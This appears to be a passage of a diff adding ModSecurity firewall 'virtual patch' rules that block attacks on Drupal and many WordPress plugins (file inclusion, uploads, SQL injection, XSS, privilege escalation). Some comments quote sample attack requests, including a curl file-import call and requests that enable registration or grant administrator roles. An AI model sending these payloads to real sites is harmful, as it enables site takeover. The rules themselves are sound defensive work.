+        SecRule ARGS_NAMES|REQUEST_COOKIES_NAMES "(?:^\#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|(?:value|access)_callback$)|\[(?:\'|\")?#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|value_callback))" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removenulls,t:removeWhiteSpace"
+
+#moved from encrypted embargoed rules
+SecRule REQUEST_URI "/\?q=" "chain,capture,phase:2,deny,log,auditlog,id:390766,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
+        SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
+        SecRule ARGS|ARGS_NAMES "\[\%2523" "t:none,t:removeWhiteSpace"
+
+#moved from encrypted embargoed rules
+SecRule REQUEST_URI "/\?q=file/ajax/actions/cancel/#options" "chain,capture,phase:2,deny,log,auditlog,id:390767,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
+        SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "t:none"
+
+#/?a=fetch&content=%3Cphp%3Edie(@md5(HelloThinkCMF))%3C/php%3E
+SecRule ARGS:a "^fetch$" "chain,capture,phase:2,deny,log,auditlog,id:390768,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Code Injection attack blocked',logdata:'%{TX.0}'"
+        SecRule ARGS:content "php" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+#PHP applications
+SecRule REQUEST_FILENAME "\.ph(?:p|tml|t)" "id:333865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309000,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"
+
+
+
+SecRule REQUEST_METHOD "!(POST|GET|HEAD)" "phase:2,id:309200,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"
+
+SecRule ARGS:action "plugins/myeasybackup/meb_download\.php" "chain,phase:2,deny,log,auditlog,id:322211,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP myEasybackup directory recursion attack ',severity:2"
+SecRule ARGS:dwn_file "\.\./" "t:none,t:urlDecodeUni,t:normalizePath"
+
+SecRule REQUEST_URI "/util/php/eval-stdin\.php"  "phase:2,deny,log,auditlog,id:393782,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PGP eval stdin attack blocked',severity:2"
+
+SecRule REQUEST_URI "connector\.minimal\.php"  "phase:2,deny,log,auditlog,id:393781,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress File Manager Plugin attack blocked',severity:2"
+
+SecRule REQUEST_FILENAME "wp-json/wp_live_chat_support/v1/remote_upload" "chain,phase:2,id:322121,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Live Chat File Upload attack',severity:2"
+SecRule &ARGS_POST:cid "@ge 1" "chain,t:none"
+SecRule FILES "\.(?:(?:p|s|x|d)?h(?:p[2-7s]?|(?:tmp?)?l?)|dll|exe|js|p(?:l|y)|rb|sh|cgi|com|bat|aspx?)" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#tccj-update=update
+#tccj-content javascript
+SecRule ARGS:tccj-update "update"  "chain,phase:2,deny,log,auditlog,id:393780,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Possible TC custom javscript injection attack blocked',severity:2"
+SecRule ARGS:tccj-content "script" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "wp-admin/profile\.php" "chain,id:334616,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Advanced Access Manager attack attempt',rev:1,severity:2"
+SecRule &ARGS:/aam_user_roles/ "@eq 1" "t:none"
+
+#WP User Avatar plugin privilege escalation attack attempt
+SecRule REQUEST_METHOD "POST" "chain,id:334617,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP User Avatar plugin privilege escalation attack attempt',rev:1,severity:2"
+SecRule REQUEST_URI "/wp-admin/profile\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:action "update" "t:none,t:lowercase,chain"
+SecRule ARGS "administrator" "t:none,t:lowercase,chain"
+SecRule &ARGS:/^members_user_roles\[\]/  "@eq 0" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule &ARGS:houzez_role "@eq 0" "t:none,t:lowercase,chain"
+SecRule REQUEST_COOKIES_NAMES   "!@contains wordpress_sec" "t:none"
+
+
+#/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
+SecRule REQUEST_URI "jax_async?_link"  "chain,phase:2,deny,log,auditlog,id:393750,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajax_asyn_link LFI attack blocked',severity:2"
+SecRule ARGS:url "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
+
+SecRule REQUEST_URI "wp-admin/tools\.php"  "chain,phase:2,deny,log,auditlog,id:393758,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
+SecRule ARGS:page "backup_manager" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:download_backup_file "\.\./" "t:none,t:urlDecodeUni,t:cmdline"
+
+SecRule REQUEST_URI "wp-content/plugins/db-backup/download\.php"  "chain,phase:2,deny,log,auditlog,id:393759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
+SecRule ARGS:file "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
+
+SecRule REQUEST_URI "ajax_shortcode_pattern\.php"  "chain,phase:2,deny,log,auditlog,id:393771,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress shortcode LFI attack blocked',severity:2"
+SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
+
+SecRule REQUEST_URI "adaptive-images-script\.php"  "chain,phase:2,deny,log,auditlog,id:393772,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress adaptive-images-script.php LFI attack blocked',severity:2"
+SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
+
+SecRule REQUEST_URI "/opac/search_rss\.php"  "chain,phase:2,deny,log,auditlog,id:393760,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OPAC RSS Search SQL injection  attack blocked',severity:2"
+SecRule ARGS:location "(?:\bselect\b|\bchr\()" "t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase"
+
+#/html2canvasproxy.php?url=http://google.com
+SecRule REQUEST_URI "html2canvasproxy\.php"  "chain,phase:2,deny,log,auditlog,id:393749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress html2canvas proxy SSRF attack blocked',severity:2"
+SecRule ARGS:url "^http" "t:none,t:urlDecodeUni,t:lowercase"
+
+#WP admin.php vulnerabilities
+SecRule REQUEST_FILENAME "wp-admin/admin\.php" "id:322199,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:322198,t:none,pass,nolog,noauditlog,skipAfter:END_WP_PHP_ADMIN"
+
+SecRule ARGS:page "wpfm-admin" "chain,phase:2,id:322314,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP AccessPress Themes attack (CVE-2020-25378)',severity:2"
+SecRule ARGS:id "\"" "t:none,t:UrlDecodeUni"
+
+SecRule ARGS:page "recall-add" "chain,phase:2,id:322313,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP recall products plugin XSS attack (CVE-2020-25380)',severity:2"
+ SecRule ARGS:/recall/ "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:UrlDecodeUni,t:removewhitespace,t:lowercase"
+
+
+SecRule ARGS:repeater "'" "chain,phase:2,id:322111,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Load More SQL injection attack',severity:2"
+SecRule ARGS:page "ajax-load-more-repeaters" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule ARGS:page "mediafromftp-search-register" "chain,phase:2,id:322122,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Medoa Recursion attack',severity:2"
+SecRule ARGS_POST:searchdir "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"
+
+SecMarker END_WP_PHP_ADMIN
+
+SecRule REQUEST_FILENAME "wp-login\.php" "id:314895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:314896,t:none,pass,nolog,noauditlog,skipAfter:END_WP_LOGIN"
+
+#Possible WP brute force login attempt
+SecRule REQUEST_METHOD "@streq POST" "chain,id:393666,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress brute force attempt, direct Login Missing Referer (not blocked)',rev:4,severity:4,tag:'no_ar'"
+SecRule REQUEST_FILENAME "/wp-login\.php" "chain,t:none,t:lowercase,t:urlDecodeUni"
+SecRule &REQUEST_HEADERS:Referer "@eq 0" "t:none,chain"
+SecRule RESPONSE_STATUS "200"
+
+ SecRule ARGS:log "!@rx ^$" "chain,id:323667,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP XSS in Loginizer attack (CVE-2018-11366)',severity:2"
+SecRule ARGS:pwd "!@rx ^$" "chain,t:none"
+SecRule ARGS "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:htmlEntityDecode,t:removewhitespace,t:lowercase"
+
+
+SecMarker END_WP_LOGIN
+
+#admin-ajax vulnerabilities
+SecRule REQUEST_FILENAME "admin-(?:ajax|post)\.php" "id:334895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:373421,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_ADMIN_AJAX"
+
+SecRule REQUEST_METHOD "POST" "id:356710,rev:1,phase:2,t:none,chain,status:403,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress PHP Anywhere < 3.0.0 - Remote Code Execution',severity:2"
+SecRule ARGS:action "parse-media-shortcode" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:shortcode "\[php_everywhere\]" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+SecRule ARGS:wcuf_current_upload_session_id "(?:\.\./\.\.|ph(?:p|tml|t))" "phase:2,id:322182,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
+
+#phphp
+SecRule ARGS:wcuf_file_name "ph(?:p|tml|t)" "phase:2,id:322183,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
+
+
+SecRule ARGS:action "gdlr_lms_cancel_booking" "phase:2,id:322102,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection attack against WP Good Layers Plugin (CVE-2020-27481)',severity:2,tag:'SQLi'"
+
+SecRule ARGS:file[title] "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:322172,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Download Manager XSS attack (CVE-2013-7319)',severity:2"
+
+
+SecRule ARGS:action "elementor_ajax" "chain,phase:2,id:322112,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Elementor Pro File Upload attack attack',severity:2"
+SecRule REQUEST_HEADERS:Referer "post-new\.php\?post_type=elementor_icons" "t:none,t:urlDecodeUni,t:htmlEntityDecode,chain"
+SecRule REQUEST_BODY "pro_assets_manager_custom_icon_upload\x22:\{\x22action\x22:\x22pro_assets_manager_custom_icon_upload\x22" "chain,t:none,t:urlDecode,t:htmlEntityDecode,t:compressWhitespace"
+SecRule FILES "\.(zip|php\d?|p?html)$" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule ARGS:action "dnd_codedropz_upload" "chain,phase:2,id:322113,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drag and Drop Upload Contact Form Code Injection attack',severity:2"
+SecRule &ARGS:upload-file "@ge 1" "chain,t:none"
+SecRule ARGS:supported_type|ARGS:filename "%" "t:none,t:urlDecodeUni"
+
+SecRule ARGS:action "import_widget_data" "chain,phase:2,id:322114,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Widget Importer/Export RFI attack',severity:2"
+SecRule ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:lowercase" 
+
+SecRule ARGS:action "mapp_tpl_" "chain,phase:2,id:322115,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MapPress Maps path recursion attack',severity:2"
+SecRule ARGS:name "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"
+
+
+#action=tnpc_render,b=html
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:383709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: KingComposer XSS attack blocked',severity:2"
+SecRule ARGS:action "kc_install_online_preset" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:322222,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP CommentLuv XSS attack blocked',severity:2"
+SecRule ARGS:_ajax_nonce "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:303669,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
+SecRule ARGS:action "_ning_upload_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:allowed_file_types "(?:php|zip)" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:303668,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
+SecRule ARGS:action "_ning_remove_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:uid "\.\./\.\./\.\." "t:none,t:urlDecodeUni,t:cmdline"
+
+#action=tnpc_render,b=html
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:303768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin attack blocked',severity:2"
+SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:b "html" "t:none,t:urlDecodeUni,t:lowercase"
+
+#action=tnpc_render,b=html
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:303769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin PHP objection insertion attack blocked',severity:2"
+SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:options[inline_edits] "(<|php|\{)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:393767,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Arbitrary File Upload Vulnerability in Jssor Slider attack blocked',severity:2"
+SecRule ARGS:param "upload_slide" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:param "upload_library" "t:none,t:urlDecodeUni,t:lowercase"
+
+#Added if users disable generic wp-config file download protection rules
+SecRule ARGS:action "duplicator_download"  "chain,phase:2,deny,log,auditlog,id:323769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-config file download attack via duplicator plugin blocked',severity:2"
+SecRule ARGS:file "(?:wp-config|\../\..)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#Release granted from encrypted embargo rules 3/4/20
+SecRule ARGS:action "sent_gift_certificate"  "phase:2,deny,log,auditlog,id:383769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce attack blocked',severity:2"
+
+#/wp-admin/admin-ajax.php?action=subscribe_email&cs_email=1@1
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:393769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
+SecRule ARGS:cs_email "1@1" "t:none,t:urlDecodeUni"
+
+SecRule REQUEST_URI "admin-ajax\.php"  "chain,phase:2,deny,log,auditlog,id:393768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
+SecRule ARGS:rootuname ";" "t:none,t:urlDecodeUni"
+
+SecRule ARGS:page "^301bulkoptions$"  "phase:2,deny,log,auditlog,id:393751,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress 301bulkoptions attack blocked',severity:2"
+
+Secrule REQUEST_URI "admin-ajax\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347147,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax XSS attack',logdata:'%{TX.0}'"
+SecRule ARGS:domain "(?:<|>)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceComments,t:removeNulls,t:removewhitespace,t:lowercase"
+
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
+SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
+
+#$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
+SecRule ARGS:action "swpsmtp_clear_log" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax file injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:swpsmtp_import_settings "1" "chain,t:none,t:utf8toUnicode,t:urlDecodeUni"
+SecRule &ARGS:swpsmtp_import_settings_file "!^0$" "t:none"
+
+#class-donor-table.php
+#Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php"          "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
+#SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
+
+#action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22users_can_register%22%2C%22value%22+%3A%221%22%7D&security=
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress GDPR Compliance Plugin Exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "wpgdprc_process_action" "t:none,t:lowercase,chain"
+SecRule ARGS:data "(?:administrator|users_can_register|https?)" "t:none,t:lowercase"
+
+#action=kiwi_social_share_set_option&args%5Bgroup%5D=users_can_register&args%5Bvalue%5D=1
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347151,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "kiwi_social_share_set_option" "t:none,t:lowercase,chain"
+SecRule ARGS "(?:administrator|users_can_register)" "t:none,t:lowercase"
+
+#action=td_ajax_update_panel&wp_option%5Busers_can_register%5D=1
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347152,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "td_ajax_update_panel" "t:none,t:lowercase,chain"
+SecRule ARGS:/wp_option/ "(?:administrator|users_can_register|https?)" "t:none,t:lowercase"
+
+#action=td_mod_register&email=master%40createsimpledomain.icu&user=mastericuuu
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "td_mod_register" "t:none,t:lowercase"
+
+#action=cp_add_subscriber&cp_set_user=administrator&message=hello&param%5Bemail%5D=master%40createsimpledomain.icu
+#action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=master%40createsimpledomain.icu&param%5Bemail%5D=master%40createsimpledomain.icu
+#action=cp_add_subscriber&cp_set_user=administrator&message=hello&param%5Bemail%5D=master%40createsimpledomain.icu
+#action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=master%40createsimpledomain.icu&param%5Bemail%5D=master%40createsimpledomain.icu
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:cp_add_subscriber "td_ajax_update_panel" "t:none,t:lowercase,chain"
+SecRule ARGS:cp_set_user "administrator" "t:none,t:lowercase"
+
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:wplc_custom_js "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action|ARGS:otw_pctl_action "(?:ewd_ufaq_updateoptions|gen_save_cssfixfront|manage_otw_pctl_options|savegooglecode)" "t:none,t:lowercase,chain"
+SecRule ARGS:/custom_css/|ARGS:home "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:action "thim_update_theme_mods" "t:none,t:lowercase,chain"
+SecRule ARGS:thim_value "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+#/wp-admin/admin-post.php?yp_remote_get
+#yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXN0cm95Zm9ybWUuY29tL3Q%2FdD0xJg%3D%3D%22%7D%5D
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:yp_json_import_data "(?:home|siteurl|http)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:yp_remote_get "[0-9a-z]" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
+SecRule ARGS:CP_ABC_post_edition "1" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:editionarea "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+#/wp-admin/admin-ajax.php?action=wcp_change_post_width
